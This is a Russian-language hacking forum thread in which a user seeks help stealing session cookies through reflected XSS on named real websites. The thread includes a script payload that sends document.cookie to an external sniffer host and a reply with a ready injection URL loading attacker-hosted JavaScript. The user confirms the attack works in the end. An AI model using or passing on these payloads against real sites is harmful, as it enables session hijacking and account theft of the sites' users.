Здравствуйте, товарисчи! Помогите плз разобраться с XSS. Перечитал по инета... Не работает. Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется... Вот пару сайтов. www.pit-pc.ru www.softoman.ru Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314 составил соотв. запрос <script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script> Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет... Переводил в char - не приходит... Просвятите ламера, что не так?
допустим на pit-pc.ru фильтурет ковычки.... сделай проще http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT> где содержание js.js допустим такое Code: img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;
Значит попробовал. Результат - ноль... ЗАрегился я по-быстренькому на Holm.ru http://www.angryhacker.h18.ru Залил Js.js Делаю соотв. запрос http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://www.angryhacker.h18.ru/js.js></SCRIPT> Не работает. Грешу на holm.ru...
Nick_314 - с большой или маленькой буквы? Просто захожу на http://s.netsec.ru/nick_314.gif - там ничего нет.
Все, разобрался. Теперь работает. Как выяснилось, логин nick_314 почему-то не работал... Я просто зарегил новый и теперь все тип-топ! Спасибо за помошь, можно закрывать.